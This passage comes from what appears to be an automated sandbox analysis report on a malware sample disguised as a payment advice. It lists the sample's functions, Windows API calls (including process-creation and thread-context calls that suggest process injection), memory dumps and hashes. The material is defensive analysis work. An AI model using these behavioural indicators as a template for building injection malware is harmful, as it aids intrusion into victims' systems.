                          • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                          • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                          • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                          • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                          Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • _malloc.LIBCMT ref: 00435278
                            • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                            • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                            • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                          • _malloc.LIBCMT ref: 00435288
                          • _malloc.LIBCMT ref: 00435298
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _malloc$AllocateHeap
                          • String ID:
                          • API String ID: 680241177-0
                          • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                          • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                          • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                          • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                          Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                          • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                          • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                          • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                          Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                          • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                          • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                          • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                          Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __lock_file_memset
                          • String ID:
                          • API String ID: 26237723-0
                          • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                          • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                          • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                          • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                          Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                          • __lock_file.LIBCMT ref: 00414EE4
                            • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                          • __fclose_nolock.LIBCMT ref: 00414EEE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 717694121-0
                          • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                          • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                          • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                          • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                          Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                          Download Yara Rule
                          APIs
                          • TranslateMessage.USER32(?), ref: 004098F6
                          • DispatchMessageW.USER32(?), ref: 00409901
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Message$DispatchTranslate
                          • String ID:
                          • API String ID: 1706434739-0
                          • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                          • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                          • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                          • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                          Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          • TranslateMessage.USER32(?), ref: 004098F6
                          • DispatchMessageW.USER32(?), ref: 00409901
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Message$DispatchTranslate
                          • String ID:
                          • API String ID: 1706434739-0
                          • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                          • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                          • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                          • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                          Function 03FA8AED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA92AB
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA9341
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA9363
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction ID: eeef7dc78d0459ce1061dd836ae0e65f5dc0cc848adc2109f24d508e5017f5ed
                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction Fuzzy Hash: 9412CF24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A4F85CF5A
                          Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                          Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                          • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                          • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                          • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                          Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ProcWindow
                          • String ID:
                          • API String ID: 181713994-0
                          • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                          • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                          • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                          • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                          Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                          • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                          • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                          • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                          Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                          • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                          • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                          • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                          • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                          Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ProcWindow
                          • String ID:
                          • API String ID: 181713994-0
                          • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                          • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                          • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                          • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                          Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wfsopen
                          • String ID:
                          • API String ID: 197181222-0
                          • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                          • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                          • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                          • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                          Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                          • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                          • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                          • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                          Function 03FA9AF0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 03FA9B01
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 451e1bdfd7d9fea6e159a109ca95a446b70a366823f0c6fe97461725584e3e8b
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: B3E0E67494010DDFDB00EFB8D54969E7FF4EF04301F1001A1FD01D2281D7709E508A62

                          Non-executed Functions

                          Function 004045E0 Relevance: 81.9, Strings: 63, Instructions: 3193COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                          • API String ID: 0-4260964411
                          • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                          • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                          • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
